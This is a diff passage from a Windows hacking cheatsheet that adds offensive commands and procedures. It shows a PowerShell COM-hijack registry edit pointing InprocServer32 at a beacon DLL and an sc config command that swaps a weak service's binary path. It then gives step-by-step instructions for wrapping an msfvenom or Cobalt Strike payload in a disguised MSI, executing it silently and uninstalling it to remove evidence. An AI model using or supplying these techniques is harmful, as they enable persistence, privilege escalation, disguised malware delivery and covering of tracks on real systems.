n0m4d1k/Hacking-Cheatsheets/Cheatsheets/win-hacking-cheatsheet.md

 #### Point Registry Item Towards EXE/DLL or Add/Edit a Field Value (POWERSHELL)

 `New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"`

+#### Change binary path of service with weak permissions

+`sc config Vuln-Service binPath= C:\Temp\fake-service.exe`

+#### Build Malicious MSI

+1. Generate payload with method of your choosing (msfvenom, Cobalt Strike, etc).
+2. Open Visual Studio.
+3. Create new project and search for installer.
+4. Select Setup Wizard and click Next.
+5. Name it and use payloads directory for location.
+6. Select place solution and project in the same directory and click Create.
+7. Click next until step 3 of 4 (choose files to include).
+8. Click Add and select your payload.
+9. Click Finish.
+10. Highlight your project and change TargetPlatform from x86 to x64 using Properties.
+(You can also change Author and Manufacturer for added legitimacy).
+11. Right-click the project and select View -> Custom Actions.
+12. Right-click Install and select Add Custom Action.
+13. Double-click Application Folder and select your payload.
+14. Click OK.
+15. Finally Build the project.
+16. Upload to target.
+17. Execute using `msiexec /i EvilInstaller.msi /q /n`
+18. Remove the evidence `msiexec /q /n /uninstall BeaconInstaller.msi`

 <!--
 ##################################################################